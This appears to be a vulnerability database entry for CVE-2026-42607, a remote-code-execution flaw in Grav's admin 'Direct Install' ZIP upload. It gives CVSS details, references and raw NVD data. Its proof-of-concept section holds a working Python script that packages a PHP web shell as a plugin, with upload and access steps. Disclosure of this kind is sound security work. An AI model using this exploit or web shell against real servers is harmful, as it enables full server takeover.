CVE-2026-42607

Description

Grav is a file-based Web platform. Prior to 2.0.0-beta.2, an authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the "Direct Install" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server. This vulnerability is fixed in 2.0.0-beta.2.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Grav < 2.0.0-beta.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os

# 1. Create malicious PHP code (Webshell)
php_content = "<?php system($_GET['cmd']); ?>"

# 2. Create a directory structure mimicking a Grav plugin
plugin_name = "malicious_plugin"
os.makedirs(plugin_name, exist_ok=True)

# Write the malicious file inside the plugin folder
shell_path = os.path.join(plugin_name, "vuln.php")
with open(shell_path, "w") as f:
    f.write(php_content)

# 3. Zip the directory
zip_filename = "exploit.zip"
with zipfile.ZipFile(zip_filename, 'w') as zipf:
    zipf.write(shell_path, arcname=os.path.join(plugin_name, "vuln.php"))

print(f"[+] Created malicious ZIP file: {zip_filename}")
print(f"[+] Upload this file to the 'Direct Install' section in Grav Admin panel.")
print(f"[+] Access the shell at: /user/plugins/{plugin_name}/vuln.php?cmd=whoami")

# Cleanup artifacts
os.remove(shell_path)
os.rmdir(plugin_name)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42607/
[4] VulDB https://vuldb.com/cve/CVE-2026-42607
[5] https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663
[6] https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42607", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:32.720", "lastModified": "2026-05-11T16:17:32.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grav is a file-based Web platform. Prior to 2.0.0-beta.2, an authenticated user with administrative privileges can achieve Remote Code Execution (RCE) by uploading a specially crafted ZIP file through the \"Direct Install\" tool. While the system attempts to block direct .php file uploads, it fails to inspect the contents of uploaded ZIP archives. Once a malicious plugin is extracted, it can execute arbitrary PHP code or drop a persistent web shell on the server. This vulnerability is fixed in 2.0.0-beta.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "source": "[email protected]"}, {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw", "source": "[email protected]"}]}}